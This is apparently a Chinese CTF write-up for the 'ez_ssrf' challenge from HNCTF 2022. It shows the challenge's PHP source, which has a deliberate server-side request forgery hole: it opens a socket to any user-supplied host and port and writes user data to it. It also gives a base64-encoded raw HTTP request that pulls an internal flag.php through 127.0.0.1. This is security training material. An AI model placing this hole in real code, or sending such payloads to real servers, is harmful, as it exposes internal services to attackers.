[HNCTF 2022 WEEK2]ez_ssrf

unable code2026-04-01 8:36

步骤

代码分析

php 复制代码 
<?php

highlight_file(__FILE__);
error_reporting(0);

$data=base64_decode($_GET['data']);  //接受data参数,并base64解码。
$host=$_GET['host'];  //接收host参数
$port=$_GET['port'];    //接收port参数

$fp=fsockopen($host,intval($port),$error,$errstr,30); //建立sock连接
if(!$fp) {
    die();
}
else {
    fwrite($fp,$data);  //往目标服务器写入data
    while(!feof($data)) //接收返回的数据
    {
        echo fgets($fp,128);
    }
    fclose($fp);
}

像服务器写入访问flag.php的请求头,然后接收。

<?php

$out = "GET /flag.php HTTP/1.1\r\n";

$out .= "Host: 127.0.0.1\r\n";

$out .= "Connection: Keep-Alive\r\n\r\n";

echo $out;

echo base64_encode($out)

?>

R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg==

相关推荐
一名优秀的码农2 小时前
vulhub系列-49-devguru(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
兢谨网安15 小时前
AI安全:从技术加固到体系化防御的实战演进
人工智能·安全·网络安全·渗透测试
xingxin3217 小时前
PHP代码分析溯源(第3题)
安全·web安全·网络安全·php
徒 花18 小时前
web前端技术知识复习
前端·html·web
曲幽18 小时前
FastAPI + Celery 实战:异步任务的坑与解法,我帮你踩了一遍
redis·python·fastapi·web·async·celery·background·task·queue
零零信安18 小时前
2026年03月29日 勒索软件监测日报 | 零零信安暗网威胁情报
网络安全·勒索软件·数据泄露·暗网·零零信安
谪星·阿凯18 小时前
RCE漏洞:从溯源解析到实战防御的完整指南
网络安全
unable code20 小时前
[NISACTF 2022]easyssrf
网络安全·web·ctf·1024程序员节
程序员小崔日记21 小时前
一篇文章带你入门漏洞靶场:从 0 到 1 玩转 bWAPP(附完整安装教程)
xml·网络安全·漏洞学习·靶场搭建
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!05Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程06UV安装并设置国内源07“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09OpenClaw 使用和管理 MCP 完全指南10安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)